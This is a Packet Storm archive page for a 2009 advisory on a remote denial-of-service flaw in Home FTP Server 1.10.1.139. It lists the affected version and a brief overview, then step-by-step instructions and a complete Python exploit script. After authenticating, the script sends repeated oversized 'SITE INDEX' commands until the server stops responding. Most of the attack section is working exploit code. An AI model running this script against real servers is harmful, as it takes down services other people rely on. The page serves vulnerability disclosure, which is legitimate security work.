what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Home FTP Server Denial Of Service

Home FTP Server Denial Of Service
Posted Nov 18, 2009
Authored by zhangmc

Home FTP Server suffers from a remote denial of service vulnerability.

tags | exploit, remote, denial of service
SHA-256 | 66a1b9607f465cc97dd2702d08b04d74f0289162cc31c8f3e78630982ad4b1c7

Home FTP Server Denial Of Service

Change Mirror Download
Date of Discovery: 16-Nov-2009

Credits:zhangmc[at]mail.ustc.edu.cn

Vendor: Ari Pikivirta
http://downstairs.dnsalias.net/homeftpserver.html

Affected:
Home FTP Server 1.10.1.139
Earlier versions may also be affected

Overview:
Home FTP Server FTP Server is an easy use FTP server Application. Denial of service

vulnerability exists in Home FTP Server that causes the application to stop service when we

send multiple irregular "SITE INDEX" commands to the server.

Details:
If you could log on the server successfully, take the following steps and the application

will stop service:

1.sock.connect((hostname, 21))
2.sock.send("user %s\r\n" %username)
3.sock.send("pass %s\r\n" %passwd)
4.for i in range(1,20):
sock.send("SITE INDEX "+ "a"*30*i +"\r\n")
5.sock.close()


Severity:
High

Exploit example:

#!/usr/bin/python
import socket
import sys

def Usage():
print ("Usage: ./expl.py <serv_ip> <Username> <password>\n")
print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
test_string="a"*30
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
for i in range(1,30):
try:
sock.connect((hostname, 21))
except:
print ("Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] "+ r
sock.send("user %s\r\n" %username)
print "[-] "+ ("user %s\r\n" %username)
r=sock.recv(1024)
print "[+] "+ r
sock.send("pass %s\r\n" %passwd)
print "[-] "+ ("pass %s\r\n" %passwd)
r=sock.recv(1024)
print "[+] "+ r


for i in range(1,20):
sock.send("SITE INDEX "+ test_string*i +"\r\n")
print "[-] "+ ("SITE INDEX "+ test_string +"\r\n")
r=sock.recv(1024)
print "[+] "+ r

sock.close()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


sys.exit(0);

Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close